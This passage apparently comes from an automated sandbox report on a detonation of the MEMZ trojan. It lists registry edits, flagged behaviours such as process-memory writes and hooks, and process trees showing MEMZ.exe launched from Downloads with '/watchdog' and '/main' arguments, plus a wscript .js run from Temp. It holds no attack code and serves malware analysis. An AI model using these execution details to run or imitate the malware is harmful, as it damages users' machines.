| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\.js
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff9e2e89758,0x7ff9e2e89768,0x7ff9e2e89778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1592 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2084 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3008 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2968 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4312 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4504 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4912 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=1708,i,11231646936966683327,17897443851128719462,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff9e2e89758,0x7ff9e2e89768,0x7ff9e2e89778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1896 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2080 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2832 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2824 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3428 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4472 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4488 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4956 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4836 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4952 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5332 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4352 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5360 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4284 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4288 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5588 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4504 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe"
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /main
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" \note.txt
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3684 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4292 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6012 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6056 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5252 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5560 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2928 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:2
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=3612 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=992 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4920 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x1f0
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=5060 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Windows\SysWOW64\mspaint.exe
"C:\Windows\System32\mspaint.exe"
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
